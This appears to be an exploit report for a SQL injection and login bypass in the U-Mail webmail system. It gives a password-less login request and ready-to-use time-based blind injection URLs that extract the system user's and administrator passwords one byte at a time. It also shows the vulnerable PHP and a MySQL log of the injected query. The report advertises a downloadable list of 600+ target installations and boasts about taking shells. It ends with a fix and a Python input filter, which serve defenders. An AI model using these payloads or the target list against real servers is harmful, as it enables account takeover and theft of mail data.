U-Mail mail system: an interface vulnerability (SQL injection; an attacker can log in without a password and obtain the administrator password)
With so many installations of this mail system out there, getting a shell on them is a matter of minutes.
1. Mail system introduction
1) Vendor site: http://www.comingchina.com/html/downloads/
2) Version: the latest release, V9.8.57
3) Test environment: Windows Server 2003 + IIS 6.0 + the vendor's default installation package
4) Reference installations: http://www.comingchina.com/html/case/ or Google "Powered by U-Mail"
Vulnerable code plus a list of 600+ URLs, download link: http://pan.baidu.com/s/1nQRzo password: ld5k
/fast/oab/module/operates.php (whitespace and case restored from the garbled copy; behaviour unchanged)

    if ($action == "save-to-pab") {
        include_once(LIB_PATH . "pab.php");
        $PAB = PAB::getInstance();
        $maillist_id = trim($_GET['maillist']);
        if ($maillist_id) {
            $member_all = $Maillist->getMemberByMaillistID($maillist_id, "Mailbox,FullName", 0);
            if (!$member_all) {
                dump_json(array("status" => TRUE, "message" => ""));
            }
            foreach ($member_all as $member) {
                if (!$PAB->getContactByMail($user_id, $member['Mailbox'], "contact_id", 0)) {
                    $data = array(
                        "user_id"    => $user_id,
                        "fullname"   => $member['FullName'],
                        "pref_email" => $member['Mailbox'],
                        "updated"    => date("Y-m-d H:i:s"),
                    );
                    $res = $PAB->add_contact($data, 0);
                    if (!$res) {
                        dump_json(array("status" => FALSE, "message" => "An error occurred while adding the contact. Adding failed!"));
                    }
                }
            }
        } else {
            // no maillist submitted: fall through to userlist
            $user_ids = trim($_GET['userlist']);
            if (!$user_ids) {
                dump_msg("param_error", "Parameter error!");
            }
            // $user_ids is concatenated raw, without quotes or an integer check,
            // so no quote is needed to break out of the IN (...) clause
            $where = "t1.UserID IN (" . $user_ids . ")";
            $arr_tmp = $Mailbox->getMailboxInfo($domain_id, $where, "", "", 0);
            $user_all = $arr_tmp['data'];
            if (!$user_all) {
                dump_json(array("status" => TRUE, "message" => ""));
            }
Function file
/admin/lib/Mailbox.php (the shipped code uses obfuscated variable names such as $_obfuscate_AkPSczrCIu40; they are replaced with descriptive names here, the logic is unchanged)

    public function getMailboxInfo($domain_id, $where = "", $page = "", $page_size = "",
                                   $order_by = "", $desc = FALSE, $debug = FALSE) {
        $domain_id = intval($domain_id);   // only the domain id is cast to an integer
        $where_sql = "t1.DomainID='" . $domain_id . "' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";
        if ($where) {
            // the caller's WHERE fragment is concatenated directly and executed as-is
            $where_sql .= " AND " . $where;
        }
        if ($page_size) {
            if ($page) {
                $offset = $page * $page_size - $page_size;
            }
            if ($offset) {
                $limit_sql = "LIMIT " . $offset . "," . $page_size;
            } else {
                $limit_sql = "LIMIT " . $page_size;
            }
        }
        if ($order_by) {
            $order_sql = "ORDER BY " . $order_by;
            if ($desc) {
                $order_sql .= " DESC";
            }
            $order_sql .= ",t1.FullName ASC";
        } else {
            $order_sql = "ORDER BY t1.OrderNo DESC,t1.Mailbox ASC";
        }
        $sql = "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*\r\n\t\tFROM "
             . $this->get_table_name("mailbox") . " as t1," . $this->get_table_name("info") . " as t2\r\n\t\tWHERE "
             . $where_sql . "\r\n\t" . $order_sql;
        $sql_limit = $sql . " " . $limit_sql;
        if ($debug) {
            dump($sql_limit);
        }
        $count = $this->db_count($sql);
        $data  = $this->db_select($sql_limit, "More");
        return array("count" => $count, "data" => $data);
    }
No credentials are needed to reach this code. The mail system ships with a default user, and the login handler does not verify the password: submitting a user name alone is treated as a successful login, after which the whole webmail function set is available to that session. Send
POST http://mail.fuck.com/webmail/fast/index.php?module=operate&action=login
with the body
mailbox=[email protected]&link=
The login succeeds. The page itself renders nothing, but every function can now be called.
Then request (the subquery must be wrapped in its own parentheses, and 0x73797374656D is the hex form of the string "system"):
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1)
The SQL statement that is executed (from the MySQL general log):
150121 20:11:25    2263 Connect   umail@localhost on
                   2263 Query     SET NAMES 'UTF8'
                   2263 Init DB   umail
                   2263 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
                                  FROM userlist as t1, mailuserinfo as t2
                                  WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
                                    AND t1.UserID IN (if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1))
                                  ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
Watch the response time: when the guessed byte is correct the reply is delayed by about 5 seconds, otherwise it returns immediately, so the password can be read out one byte at a time.
The same technique reads the administrator password, which gives control over every user and mailbox. The management accounts live in the web_usr table.
Single quotes cannot be used in the exploit, so strings are written as hex literals and the target row is selected by a numeric column instead. The exploit values for the admin and administrator accounts are therefore:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from web_usr where role_code=1),1,1))=97,sleep(5),1)
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where role_code=2),1,1))=97,sleep(5),1)
Solution:
Run $user_ids through the existing id_list_filter() function before it is concatenated into the WHERE clause, so that only a plain comma-separated list of integer user IDs ever reaches getMailboxInfo().
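The report names id_list_filter() but does not show it. As an added example (not U-Mail's code), the following Python models the behaviour such a filter needs: the userlist value is accepted only if it is a comma-separated list of positive integers, the list is deduplicated and bounded, and the WHERE fragment is built from the parsed integers rather than from the raw string, so the report's payload is rejected before any SQL exists. The PHP fix would apply the same rule to $user_ids in operates.php; the MAX_IDS cap is an assumption.

```python
import re
from typing import List, Optional

# Constructed model of the filter the report recommends (id_list_filter());
# U-Mail's real implementation is not shown in the report.
_ID_LIST_RE = re.compile(r"\d+(,\d+)*")
MAX_IDS = 500  # assumption: cap the IN list so an enormous list cannot be abused


def id_list_filter(raw: str, max_ids: int = MAX_IDS) -> Optional[List[int]]:
    """Return a sorted, deduplicated list of positive integer IDs, or None if the
    input is anything other than a plain comma-separated integer list."""
    raw = raw.strip()
    if not _ID_LIST_RE.fullmatch(raw):
        return None
    ids = sorted({int(x) for x in raw.split(",")})
    if ids[0] <= 0 or len(ids) > max_ids:
        return None
    return ids


def build_where(raw: str) -> Optional[str]:
    """Build the fragment operates.php concatenates, from validated integers only."""
    ids = id_list_filter(raw)
    if ids is None:
        return None
    return "t1.UserID IN (" + ",".join(str(i) for i in ids) + ")"


# The report's exploit value, used here to show the filter rejecting it.
PAYLOAD = ("if(ascii(substr((select password from web_usr where role_code=1),1,1))=97,"
           "sleep(5),1)")

if __name__ == "__main__":
    print(build_where("3,5,5,4"))   # normal request
    print(build_where(PAYLOAD))     # None: rejected before any SQL is built
```

The caller should treat None as the "param_error" case and return without querying; building the IN list from the parsed integers (rather than echoing the validated string) also removes the leading-zero and whitespace variants that a regex alone would let through.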